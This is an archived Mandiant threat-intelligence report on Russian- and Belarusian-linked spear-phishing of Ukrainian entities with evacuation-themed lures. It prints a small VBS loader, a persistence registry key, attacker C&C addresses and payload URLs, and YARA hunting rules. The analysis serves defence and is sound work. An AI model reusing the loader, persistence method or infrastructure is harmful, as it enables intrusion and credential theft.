{ "id": "62988be2-cb50-4b05-b54e-185b0df8df41", "created_at": "2026-04-06T00:18:49.069778Z", "updated_at": "2026-04-10T13:11:36.322988Z", "deleted_at": null, "sha1_hash": "91acb4a1d7712dcdd3c3a17f7cc234f5109cf4c8", "title": "Evacuation and Humanitarian Documents used to Spear Phish Ukrainian Entities | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 543855, "plain_text": "Evacuation and Humanitarian Documents used to Spear Phish\r\nUkrainian Entities | Mandiant\r\nBy Mandiant\r\nPublished: 2022-07-20 · Archived: 2026-04-05 18:17:22 UTC\r\nWritten by: Mandiant Threat Intelligence\r\nForeword\r\nMandiant is publishing the following blog to provide insight and context on a sampling of malicious activity\r\ntargeting Ukrainian entities during the ongoing war. We are highlighting UNC1151 and suspected UNC2589\r\noperations leveraging phishing with malicious documents leading to malware infection chains. Indicators used in\r\nthese operations have been released by U.S. CYBERCOMMAND.\r\nUA CERT has also published on several of these operations. Links to UA CERT reports can be found throughout\r\nthis blog.\r\nThreat Detail\r\nSince the start of the Russian invasion, public and private Ukrainian entities have been targeted by multiple cyber\r\nespionage groups. This blog goes into detail regarding two operations from UNC2589 and an operation from\r\nclusters likely related to UNC1151. While these groups have distinct sponsors and goals, the operations detailed\r\nhere are united by their use of lure documents about public safety to entice victims to open the spear phishing\r\nattachment.\r\nSpear phishes with themes that are urgent or timely can make a recipient more likely to open them and documents\r\nrelated to public safety and humanitarian emergencies are of particularly high interest to the residents of Ukraine\r\nfollowing the Russian invasion. These operations were designed to gain access to networks of interest, but we do\r\nnot have insight into the planned follow-on activities. The malware used in these intrusion attempts would enable a\r\nwide variety of operations and these groups have previously conducted espionage, information operations and\r\ndisruptive attacks.\r\nThe intrusion attempts detailed below share a tactic, however they are the work of two separate cyber espionage\r\ngroups.\r\nUNC1151 is a group that Mandiant assesses are sponsored by Belarus and have frequently used the access\r\nand information gained by their intrusions to support information operations tracked as “Ghostwriter.”\r\nMandiant released a blog last year detailing our assessments on UNC1151, and they have continued to be\r\nvery active in targeting Ukraine since the start of the Russian invasion, paralleling Belarus’s government’s\r\nenablement of Russia’s invasion.\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 1 of 14\n\nUNC2589 is believed to act in support of Russian government interest and has been conducting extensive\r\nespionage collection in Ukraine. Notably, we assess UNC2589 is behind the January 14th disruptive attacks\r\non Ukrainian entitles with PAYWIPE (WHISPERGATE). Following the disruptive attack, UNC2589 has\r\nprimarily targeted Ukraine, but has also been active against NATO member states in North America and\r\nEurope.\r\nThe activity discussed below is only a small subset of the extensive cyber operations that have targeted Ukraine\r\nwith disruptive and espionage motivated operations.\r\nLikely UNC2589 Operations\r\nActor Overview\r\nUNC2589 is a cluster of cyber espionage activity Mandiant has tracked since early 2021 and may have been active\r\nas early as late 2020. Though UNC2589 has primarily targeted entities in Ukraine and Eastern Europe, it has also\r\nactively targeted government and defense entities throughout Europe and North America. We believe UNC2589 acts\r\nin support of Russian government goals, but have not uncovered evidence to link it conclusively.\r\nUNC2589 uses spear phishing campaigns, which may be disguised as forwarded emails from both actor-controlled\r\nand compromised legitimate accounts. Lure themes leveraged by UNC2589 include COVID-19, the war in Ukraine,\r\ngovernment related themes, regional themes, or even generic themes such as Bitcoin. Payloads for the phishing\r\noperations include malicious macro documents, CPL downloaders, ZIP files, or other archives. UNC2589 has also\r\nused a variety of different infrastructure, including actor-controlled domains, IP addresses located mostly in Russia,\r\nand Discord channels.\r\nThough we track UNC2589 as a cluster of cyber espionage activity, we have attributed the January 14 destructive\r\nattack on Ukraine using PAYWIPE (WHISPERGATE) to UNC2589. We believe UNC2589 may be capable of\r\nengaging in disruptive or destructive cyber operations in the future.\r\nMalware Overview\r\nGRIMPLANT is a backdoor written in GO which reaches out using Google RPC to a Base64-encoded and\r\nAESCTS-encrypted C\u0026C read from a command-line argument. GRIMPLANT conducts a system survey which it\r\nuploads to the C\u0026C and can execute commands provided by the C\u0026C on the victim’s device.\r\nGRAPHSTEEL is an infostealer which appears to be a modified, weaponized version of the public Github project\r\ngoLazagne. GRAPHSTEEL gathers a survey of the victim machine including browser credentials, enumerates\r\ndrives D – Z, and uploads files to the C\u0026C.\r\nLikely UNC2589 Campaign Leverages Evacuation-Themed Lure\r\nInfection Vector\r\nMandiant analyzed a malicious document with an evacuation plan-themed lure, likely used by UNC2589 to target\r\nUkrainian entities in a phishing campaign in late February 2022. This sample is a packed SFX RAR that runs and\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 2 of 14\n\ninstalls an Arabic version of the RemoteUtils utility. Upon execution, the Remote Utilities utility reaches out to a\r\nC\u0026C used in an earlier UNC2589 operation also targeting Ukraine\r\nFigure 1: SBU alert on fake evacuation emails (Source)\r\nThe infection vector is currently uncertain, but we suspect the malicious files may have been delivered via phishing\r\nemail. It is important to note that Remote Utilities comes in a UPX-packed SFX RAR from the vendor, and it does\r\nnot appear the attackers changed the default. However, the attackers appear to have used several layers of password-protected archives before dropping and executing the default UPX-packed SFX extractor with a SFX RAR. The lure\r\ndocuments all reference an “evacuation plan” allegedly originating from the Ukrainian SBU.\r\nплан евакуації (затверджений сбу 28.02.2022 наказом № 009363677833).rar_pass_123.zip (MD5:\r\ncd8834da2cfb0285fa75decf6c67d049)\r\nPassword-protected ZIP file\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 3 of 14\n\nPassword: 123\r\nПлан евакуації (затверджений СБУ 28.02.2022 Наказом № 009363677833).rar (MD5:\r\n3cd599654aff2e432ae3390d33c64f5e)\r\nRAR containing RAR SFX and text file with RAR passwords\r\nкод доступу.txt (MD5: 144ccb808e2d2e1f0119ea2a8f7490bc)\r\nText file with RAR password\r\nPassword: 2267903645\r\n2b0338c9f3f46955cfd2dc97c02bd554 (application/x-rar) план евакуації (затверджений сбу 28.02.2022\r\nнаказом № 009363677833).part1.rar\r\nPassword-protected SFX RAR\r\nPassword: 2267903645\r\nContains: План евакуації (затверджений СБУ 28.02.2022 Наказом № 009363677833).exe (MD5:\r\nea47d88d73fecb1fad1e737f1b373d7f)\r\n97e16c0b770dbbe4fa94cebac92082b7 (application/x-rar) план евакуації (затверджений сбу 28.02.2022\r\nнаказом № 009363677833).part2.rar\r\nPassword-protected SFX RAR\r\nPassword: 2267903645\r\nContains: План евакуації (затверджений СБУ 28.02.2022 Наказом № 009363677833).exe (MD5:\r\nea47d88d73fecb1fad1e737f1b373d7f)\r\nПлан евакуації (затверджений СБУ 28.02.2022 Наказом № 009363677833).exe (MD5:\r\nea47d88d73fecb1fad1e737f1b373d7f)\r\nTranslation: Evacuation Plan (approved by SBU 28.02.2022 in order № 009363677833).exe\r\nUPX-packed SFX extractor; likely default for Remote Utilities\r\nUnpacked: MD5: a236cb7f2b0e34619039788de7f7760b\r\nC:\\Program Files (x86)\\Remote Utilities – Host\\ rutserv.exe (MD5: 2bb5d5aa07fa2c8e9874c117c8fa51d6)\r\nRemoteUtils utility\r\nExecution\r\nUpon execution of the packed SFX RAR, it installs the Remote Utilities executable. The Remote Utilities\r\nexecutable reaches out to preconfigured C\u0026Cs iteratively over TCP:\r\n111.90.151.182:5651\r\n111.90.151.182:8080\r\n111.90.151.182:5555\r\n111.90.151.182:4899\r\nRemote Utilities is not malicious by itself but can be used maliciously by threat actors. The utility can enable a\r\nthreat actor to:\r\nDownload and upload files to a C\u0026C\r\nRemotely execute files\r\nSet persistence through a startup service\r\nPersistence Method\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 4 of 14\n\nRemote Utilities allows attackers to set persistence through creating a startup service.\r\nLikely UNC2589 Uses Wage and Anti-Virus Themed Lures\r\nInfection Vector\r\nMandiant Intelligence discovered a likely UNC2589 related phishing campaign targeting Ukrainian entities with\r\nGRIMPLANT and GRAPHSTEEL malware on March 27, 2022. The Ukrainian CERT previously reported on\r\nUAC-0056, a cluster that aligns with what we track as UNC2589, using GRIMPLANT, GRAPHSTEEL, and\r\nBEACON malware against Ukrainian entities.\r\nThe malware was delivered via phishing email. The attacker used a compromised legitimate account from a related\r\norganization to send the phishing emails on March 27.\r\nThe phishing email contained an attached XLS document with macros.\r\nЗаборгованість по зарплаті.xls (MD5: da305627acf63792acb02afaf83d94d1)\r\nMachine translation from Ukrainian: Wage arrears\r\nTimestamp: 2022-03-21 09:37:30\r\nContains legitimate macros from ExcelVBA.ru, a company which creates benign Macros for Excel\r\nfor legitimate use\r\nThe macros in the document were designed by ExcelVBA.ru, a company that designs macros for business use.\r\nHowever, in this case the macro was used to drop a malicious payload onto the victim machine. The company’s\r\nwebsite makes the macros freely available, so we have no indication that they are tied to this activity or even aware\r\nof it.\r\nBase-Update.exe (MD5: 06124da5b4d6ef31dbfd7a6094fc52a6)\r\nDownloader written in Go\r\nCompile time: 1970-01-01 00:00:00\r\nC\u0026C: 194.31.98.124:443\r\nNote: The Go binary Base-Update.exe does not have symbols stripped. Symbols from the main Go module in this\r\nproject are called “elephant.”\r\nUnlike the downloaders previously documented by UA CERT, Mandiant Threat Intelligence believes that these\r\ndownloaders were likely altered by the threat actor to avoid detection. One of the new techniques utilized by the\r\nthreat actor was runtime decryption of certain strings.\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 5 of 14\n\nFigure 2: New downloader identified by Mandiant Threat Intelligence decrypting strings with custom key and XOR\r\nalgorithm\r\nFigure 3: Original downloader generating the path for java-sdk.exe\r\nExecution\r\nUpon execution of Base-Update.exe, it proceeds to download, Base64-decode, and execute another time stomped\r\ndownloader written in Go from http://194.31.98.124:443/i with the arguments –a 0CyCcrhI/6B5wKE8XLOd+w==:\r\n%TEMP%\\java-sdk.exe (MD5: 36ff9ec87c458d6d76b2afbd5120dfae)\r\nDownloader written in Go\r\nBase64 encoded - MD5: 2f14b3d5ab01568e2707925783f8eafe\r\nCompile time: 1970-01-01 00:00:00\r\nC\u0026C: 194.31.98.124:443\r\nJava-sdk.exe sets persistence for itself via setting a Run registry key. It then proceeds to download, decode, and\r\nexecute two additional Base64-encoded files, GRIMPLANT and GRAPHSTEEL.\r\noracle-java.exe (MD5: 4a5de4784a6005aa8a19fb0889f1947a)\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 6 of 14\n\nGRIMPLANT backdoor\r\nBase64-encoded – MD5: 2a843511cdb8f5604cb3fafe244ef5f2\r\nCompile time: 1970-01-01 00:00:00\r\nC\u0026C: http://194.31.98.124:80\r\nmicrosoft-cortana.exe (MD5: 6b413beb61e46241481f556bb5cdb69c)\r\nGRAPHSTEEL infostealer\r\nBase64-encoded – MD5: a0c4ddf9c6f95d7046be8a2e0f875935\r\nCompile time: 2022-03-20 14:24:42\r\nC\u0026C: ws://194.31.98.124:443/c\r\nGRIMPLANT Execution\r\nUpon execution of GRIMPLANT, it reads its configured C\u0026C from the command line. The configured C\u0026C is\r\nBase64-encoded and AESCTS-encrypted and results in GRIMPLANT communicating to 194.31.98.124.\r\nGRIMPLANT conducts a basic system survey, querying the following:\r\nComputer name\r\nUsername\r\nHome directory\r\nIP address (via Ipify API)\r\nHostname\r\nOS\r\nNumber of CPUs\r\nGRIMPLANT then uploads the system survey to the C\u0026C. Note that GRIMPLANT communicates with the C\u0026C\r\nover Google RPC using TLS. GRIMPLANT handles PowerShell commands it receives from the C\u0026C, sending the\r\nresult of the command back to the C\u0026C. Unlike GRAPHSTEEL, GRIMPLANT does not use an added layer of\r\nencryption to its C\u0026C communications.\r\nGRAPHSTEEL Execution\r\nUpon execution of GRAPHSTEEL, it conducts a system survey of the host and user information and reaches out to\r\nthe ipify API to determine the IP address. It then AESCTS encrypts and uploads the surveyed victim information to\r\nthe C\u0026C. When it gets a response from the C\u0026C, GRAPHSTEEL proceeds to harvest browser credentials,\r\nincluding:\r\nChrome\r\nInternet Explorer\r\nFireFox\r\nThunderbird\r\nGRAPHSTEEL also attempts to collect mail data from Mozilla Thunderbird, extract data from Filezilla, find\r\nunprotected SSH keys on the target machine, query Putty to access the public key, and read any MobaXterm config.\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 7 of 14\n\nAfter collecting this information, it encrypts and uploads the information to the C\u0026C. GRAPHSTEEL then\r\nenumerates drives D-Z and the files within each drive. GRAPHSTEEL reads the content of each unique file and\r\nuploads those to the C\u0026C.\r\nNote: the GRAPHSTEEL project also does not have symbols stripped and the main Go package is called\r\n“elephant.”\r\nPersistence Method\r\nThe malware maintains its persistence on the victim’s system by setting the following Run registry key:\r\nKey: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\java-sdk\r\nValue: %TEMP%\\java-sdk.exe -a\r\nRelated Samples\r\nThis activity is related to activity previously reported on by UA CERT on a campaign leveraging GRIMPLANT and\r\nGRAPHSTEEL malware. Notably, the two campaigns share malware overlaps and filename overlaps, but lack\r\ninfrastructure overlaps. In addition, unlike other UNC2589 campaigns including the one reported on by UA CERT,\r\nthis new operation does not use Discord to host malware.\r\nInstruction on anti-virus protection.doc (MD5: ca9290709843584aecbd6564fb978bd6)\r\nLure document\r\nC\u0026C: https://forkscenter.fr/BitdefenderWindowsUpdatePackage.exe\r\nUser guide.doc (MD5: cf204319f7397a6a31ecf76c9531a549)\r\nLure document\r\nC\u0026C: https://forkscenter.fr/BitdefenderWindowsUpdatePackage.exe\r\nbitdefenderwindowsupdatepackage.exe (MD5: b8b7a10dcc0dad157191620b5d4e5312)\r\nDropper for alt.exe\r\nDownloaded from https://forkscenter.fr/BitdefenderWindowsUpdatePackage.exe\r\nalt.exe (MD5: 2fdf9f3a25e039a41e743e19550d4040)\r\nThemida packed downloader\r\nC\u0026Cs:\r\nhttps://cdn.discordapp.com/attachments/947916997713358890/949948174636830761/one.exe\r\nhttps://cdn.discordapp.com/attachments/947916997713358890/949948174838165524/dropper.exe\r\none.exe (MD5: aa5e8268e741346c76ebfd1f27941a14)\r\nDownloader and BEACON loader\r\nDownloads wisw.exe from https://forkscenter.fr/Sdghrt_umrj6/wisw.exe\r\nBEACON Shellcode MD5: e56555162c559a55021b879147b0791f\r\nC\u0026Cs:\r\nhttps://nirsoft.me/nEDFzTtoCbUfp9BtSZlaq6ql8v6yYb/avp/amznussraps/\r\nhttps://nirsoft.me/s/2MYmbwpSJLZRAtXRgNTAUjJSH6SSoicLPIrQl/field-keywords/\r\nwisw.exe (MD5: 9ad4a2dfd4cb49ef55f2acd320659b83)\r\nThemida packed downloader\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 8 of 14\n\nDownloaded from https://forkscenter.fr/Sdghrt_umrj6/wisw.exe\r\nC\u0026C:\r\nhttps://cdn.discordapp.com/attachments/947916997713358890/949978571680673802/cesdf.exe\r\ndropper.exe (MD5: 15c525b74b7251cfa1f7c471975f3f95)\r\nGo downloader\r\nC\u0026C: https://45.84.0.116/i\r\njava-sdk.exe (MD5: c8bf238641621212901517570e96fae7)\r\nGo downloader\r\nDownloaded as Base64 encoded text from https://45.84.0.116/i\r\nC\u0026Cs:\r\nhttp://45.84.0.116:443/m\r\nhttp://45.84.0.116:443/p\r\noracle-java.exe (MD5: 4f11abdb96be36e3806bada5b8b2b8f8)\r\nGRIMPLANT malware\r\nDownloaded as Base64 encoded text from http://45.84.0.116:443/m\r\nmicrosoft-cortana.exe (MD5: 9ea3aaaeb15a074cd617ee1dfdda2c26)\r\nGRAPHSTEEL malware\r\nDownloaded as Base64 encoded text from http://45.84.0.116:443/p\r\nUNC1151 Operations\r\nActor Overview\r\nUNC1151 is a cluster of cyber espionage activity which has links to the Belarusian government. (Please see our\r\npreviously published blog on UNC1151 for additional details). UNC1151 also provides technical support to the\r\nGhostwriter information operations campaign. Though we cannot rule out Russian contributions to either UNC1151\r\nor Ghostwriter activities, we have not yet identified evidence of any collaboration between Russian APTs and\r\nUNC1151.\r\nUNC1151 primarily targets government and media entities focusing on Ukraine, Lithuania, Latvia, Poland, and\r\nGermany. UNC1151 has been active in targeting primarily Ukraine and Poland since the Russian invasion of\r\nUkraine in February.\r\nMalware Overview\r\nBEACON is a backdoor written in C/C++ that is part of the Cobalt Strike framework. Supported backdoor\r\ncommands include shell command execution, file transfer, file execution, and file management. BEACON can also\r\ncapture keystrokes and screenshots as well as act as a proxy server. BEACON may also be tasked with harvesting\r\nsystem credentials, port scanning, and enumerating systems on a network. BEACON communicates with a C\u0026C\r\nserver via HTTP or DNS.\r\nMICROBACKDOOR is a client backdoor and server-side tool which has been available on GitHub since May\r\n2021. MICROBACKDOOR was developed by ‘Cr4sh’ (aka. Dmytro Oleksiuk), who has also developed other\r\nnotable malware used by Russian APTs including BlackEnergy. MICROBACKDOOR can upload and download\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 9 of 14\n\nfiles, execute commands, update itself, and take screenshots. It also supports HTTP, Socks4 and Socks5 proxies to\r\nroute traffic.\r\nNote: the version of MICROBACKDOOR used by UNC1151 in this report has been modified by the actor to\r\ninclude a screenshot functionality. Screenshot functionality is not present in the version of MICROBACKDOOR\r\navailable on Github.\r\nUNC1151 Uses Sheltering-Themed Lures\r\nInfection Vector\r\nIn early March 2022, Mandiant Threat Intelligence discovered new activity targeting Ukrainian entities using\r\nMICROBACKDOOR and a lure titled “що робити? пiд час артилерiйских обстрiлiв системами залповова\r\nвогню” (Translation: “What to do? During artillery shelling by volley fire systems”). MICROBACKDOOR is a\r\nclient backdoor and server side (command and control) tool which has been available on GitHub since May 2021\r\nand developed by ‘Cr4sh’ (aka Dmytro Oleksiuk).\r\nTo deliver the payload, the actor used a ZIP containing a CHM-file.\r\nдовідка.zip (MD5: e34d6387d3ab063b0d926ac1fca8c4c4)\r\nTranslation: Certificate.zip\r\ndovidka.chm (MD5: 2556a9e1d5e9874171f51620e5c5e09a)\r\nContains obfuscated VBS\r\nExecution\r\nIf the desktop.ini does not exist in the path C:\\Users\\Public\\Favorites\\desktop.ini (indicating that the backdoor is not\r\nyet installed), the VBS code within dovidka.chm drops the decoded next payload to C:\\Users\\Public\\ignit.vbs. The\r\ncode then creates the folder C:\\Users\\Public\\Favorites and executes C:\\Users\\Public\\ignit.vbs.\r\nC:\\Users\\Public\\ignit.vbs (MD5: bd65d0d59f6127b28f0af8a7f2619588)\r\nMalicious VBS launcher\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 10 of 14\n\nThe VBS file ignit.vbs mentioned in figure 4, drops three files:\r\n%STARTUP%\\Windows Prefetch.lNk (MD5: 8fc42ee971ab296f921bb05633f6b4a6)\r\nLNK used to achieve persistence for the payload via the Startup folder\r\nNote: the unusual capitalization is hardcoded\r\nC:\\Users\\Public\\Favorites\\desktop.ini (MD5: a9dcaf1c709f96bc125c8d1262bac4b6)\r\nHelper file to launch the payload, core.dll\r\nC:\\Users\\Public\\Libraries\\core.dll (MD5: d2a795af12e937eb8a89d470a96f15a5)\r\nFollow-on payload\r\nCompile Timestamp: 2022-01-31T15:00:46.000+0000\r\nLoads in memory:\r\n047fbbb380cbf9cd263c482b70ddb26f\r\nEither via the LNK after startup, or directly via the VBS, the command line “wscript.exe //B //E:vbs\r\nC:\\Users\\Public\\Favorites\\desktop.ini” is executed, referencing the helper file dropped by the sample mentioned\r\nabove. Finally, the file C:\\Users\\Public\\ignit.vbs is deleted after execution.\r\n“desktop.ini” is used to invoke regasm.exe to launch the payload found in C:\\Users\\Public\\Libraries\\core.dll as a\r\nhidden window without returning any error codes.\r\nThe entire contents of this file are:\r\nSet fso = CreateObject(\"Scripting.FileSystemObject\")\r\nexecPath = \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U \" \u0026 \"C:\\Users\\Public\\Libraries\\core.dll\"\r\nSet shell = CreateObject(\"Wscript.Shell\")\r\nshell.run(execPath), 0, false\r\nThe file C:\\Users\\Public\\Libraries\\core.dll is a malicious .NET file packed with an unknown obfuscator which may\r\nbe related to Confuser. This samples drops an additional malicious payload into memory and executes it.\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 11 of 14\n\nclient.dll (MD5:047fbbb380cbf9cd263c482b70ddb26f)\r\nDescription: MICROBACKDOOR backdoor\r\nC\u0026C: xbeta.online:8443\r\nThe payload (MD5: 047fbbb380cbf9cd263c482b70ddb26f) is a sample of MICROBACKDOOR. This backdoor\r\nmalware has capabilities such as manipulating files (list/get/put), execute commands, can automatically update\r\nitself, and take screenshots. This family also supports HTTP, Socks4 and Socks5 proxies to route traffic.\r\nMICROBACKDOOR is an open source project written by cr4sh, aka Dmytro Oleksiuk. As with other\r\nMICROBACKDOOR samples previously used by UNC1151, this sample appears to have had the screenshot\r\nfunctionality added.\r\nOnce run, the MICROBACKDOOR payload would reach out to ‘xbeta.online:8443’. It would transmit a packet of\r\ndata every 10 seconds.\r\nAppendix\r\nMITRE ATT\u0026CK Framework\r\nUNC2589\r\nT1003: OS Credential Dumping\r\nT1027: Obfuscated Files or Information\r\nT1027.002: Software Packing\r\nT1055: Process Injection\r\nT1059: Command and Scripting Interpreter\r\nT1059.005: Visual Basic\r\nT1070.006: Timestomp\r\nT1071.001: Web Protocols\r\nT1082: System Information Discovery\r\nT1083: File and Directory Discovery\r\nT1114.001: Local Email Collection\r\nT1140: Deobfuscate/Decode Files or Information\r\nT1497.001: System Checks\r\nT1547.001: Registry Run Keys / Startup Folder\r\nT1552.001: Credentials In Files\r\nT1555.003: Credentials from Web Browsers\r\nT1560: Archive Collected Data\r\nT1560.001: Archive via Utility\r\nT1566.001: Spearphishing Attachment\r\nT1573.001: Symmetric Cryptography\r\nT1573.002: Asymmetric Cryptography\r\nT1622: Debugger Evasion\r\nUNC1151\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 12 of 14\n\nT1012: Query Registry\r\nT1016: System Network Configuration Discovery\r\nT1027: Obfuscated Files or Information\r\nT1033: System Owner/User Discovery\r\nT1055: Process Injection\r\nT1059: Command and Scripting Interpreter\r\nT1070.006: Timestomp\r\nT1071.001: Web Protocols\r\nT1082: System Information Discovery\r\nT1083: File and Directory Discovery\r\nT1087: Account Discovery\r\nT1095: Non-Application Layer Protocol\r\nT1140: Deobfuscate/Decode Files or Information\r\nT1547.009: Shortcut Modification\r\nT1573.002: Asymmetric Cryptography\r\nT1620: Reflective Code Loading\r\nT1622: Debugger Evasion\r\nDetection Rules\r\nrule MTI_HUNTING_Crypto_GRIMPLANT_GRAPHSTEEL\r\n{\r\nmeta:\r\nauthor = \"Mandiant Threat Intelligence\"\r\ndescr = \"Find the crypto key for GRIMPLANT/GRAPHSTEEL C2 decryption\"\r\ndisclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\nstrings:\r\n$ = {f1 d2 19 60 d8 eb 2f dd f2 53 8d 29 a5 fd 50 b5}\r\n$ = {f6 4a 3f 9b f0 6f 2a 3c 4c 95 04 38 c9 a7 f7 8e}\r\n$ = \" ciphertext is not large enough. It is less that one block size. Blocksize:%v; Ciphertext:%v\"\r\ncondition:\r\nall of them\r\n}\r\nrule MTI_Hunt_APT_Modified_MICROBACKDOOR_Strings\r\n{\r\nmeta:\r\ndescription = \"Detects strings found in modified MICROBACKDOOR samples with screenshot capability\"\r\ndisclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\"\r\nstrings:\r\n$a = \"ERROR: Unknown command\"\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 13 of 14\n\n$b = \"ProxyServer\"\r\n$c = \"screenshot\"\r\n$d = \"uninst\"\r\n$e = \"shell\"\r\n$f = \"client.dll\"\r\n$g = \"Timeout occured\"\r\ncondition:\r\nall of them\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.mandiant.com/resources/spear-phish-ukrainian-entities" ], "report_names": [ "spear-phish-ukrainian-entities" ], "threat_actors": [ { "id": "f29188d8-2750-4099-9199-09a516c58314", "created_at": "2025-08-07T02:03:25.068489Z", "updated_at": "2026-04-10T02:00:03.827361Z", "deleted_at": null, "main_name": "MOONSCAPE", "aliases": [ "TA445 ", "UAC-0051 ", "UNC1151 " ], "source_name": "Secureworks:MOONSCAPE", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "eecf54a2-2deb-41e5-9857-fed94a53f858", "created_at": "2023-01-06T13:46:39.349959Z", "updated_at": "2026-04-10T02:00:03.296196Z", "deleted_at": null, "main_name": "SaintBear", "aliases": [ "Bleeding Bear", "Cadet Blizzard", "Nascent Ursa", "Nodaria", "Storm-0587", "DEV-0587", "Saint Bear", "EMBER BEAR", "UNC2589", "TA471", "UAC-0056", "FROZENVISTA", "Lorec53", "Lorec Bear" ], "source_name": "MISPGALAXY:SaintBear", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "119c8bea-816e-4799-942b-ff375026671e", "created_at": "2022-10-25T16:07:23.957309Z", "updated_at": "2026-04-10T02:00:04.807212Z", "deleted_at": null, "main_name": "Operation Ghostwriter", "aliases": [ "DEV-0257", "Operation Asylum Ambuscade", "PUSHCHA", "Storm-0257", "TA445", "UAC-0051", "UAC-0057", "UNC1151", "White Lynx" ], "source_name": "ETDA:Operation Ghostwriter", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "HALFSHELL", "Impacket", "RADIOSTAR", "VIDEOKILLER", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "c28760b2-5ec6-42ad-852f-be00372a7ce4", "created_at": "2022-10-27T08:27:13.172734Z", "updated_at": "2026-04-10T02:00:05.279557Z", "deleted_at": null, "main_name": "Ember Bear", "aliases": [ "Ember Bear", "UNC2589", "Bleeding Bear", "DEV-0586", "Cadet Blizzard", "Frozenvista", "UAC-0056" ], "source_name": "MITRE:Ember Bear", "tools": [ "P.A.S. Webshell", "CrackMapExec", "ngrok", "reGeorg", "WhisperGate", "Saint Bot", "PsExec", "Rclone", "Impacket" ], "source_id": "MITRE", "reports": null }, { "id": "03a6f362-cbab-4ce9-925d-306b8c937bf1", "created_at": "2024-11-01T02:00:52.635907Z", "updated_at": "2026-04-10T02:00:05.339384Z", "deleted_at": null, "main_name": "Saint Bear", "aliases": [ "Saint Bear", "Storm-0587", "TA471", "UAC-0056", "Lorec53" ], "source_name": "MITRE:Saint Bear", "tools": [ "OutSteel", "Saint Bot" ], "source_id": "MITRE", "reports": null }, { "id": "8a33d3ac-14ba-441c-92c1-39975e9e1a73", "created_at": "2023-01-06T13:46:39.195689Z", "updated_at": "2026-04-10T02:00:03.243054Z", "deleted_at": null, "main_name": "Ghostwriter", "aliases": [ "UAC-0057", "UNC1151", "TA445", "PUSHCHA", "Storm-0257", "DEV-0257" ], "source_name": "MISPGALAXY:Ghostwriter", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "083d63b2-3eee-42a8-b1bd-54e657a229e8", "created_at": "2022-10-25T16:07:24.143338Z", "updated_at": "2026-04-10T02:00:04.879634Z", "deleted_at": null, "main_name": "SaintBear", "aliases": [ "Ember Bear", "FROZENVISTA", "G1003", "Lorec53", "Nascent Ursa", "Nodaria", "SaintBear", "Storm-0587", "TA471", "UAC-0056", "UNC2589" ], "source_name": "ETDA:SaintBear", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "Elephant Client", "Elephant Implant", "GraphSteel", "Graphiron", "GrimPlant", "OutSteel", "Saint Bot", "SaintBot", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434729, "ts_updated_at": 1775826696, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/91acb4a1d7712dcdd3c3a17f7cc234f5109cf4c8.pdf", "text": "https://archive.orkl.eu/91acb4a1d7712dcdd3c3a17f7cc234f5109cf4c8.txt", "img": "https://archive.orkl.eu/91acb4a1d7712dcdd3c3a17f7cc234f5109cf4c8.jpg" } }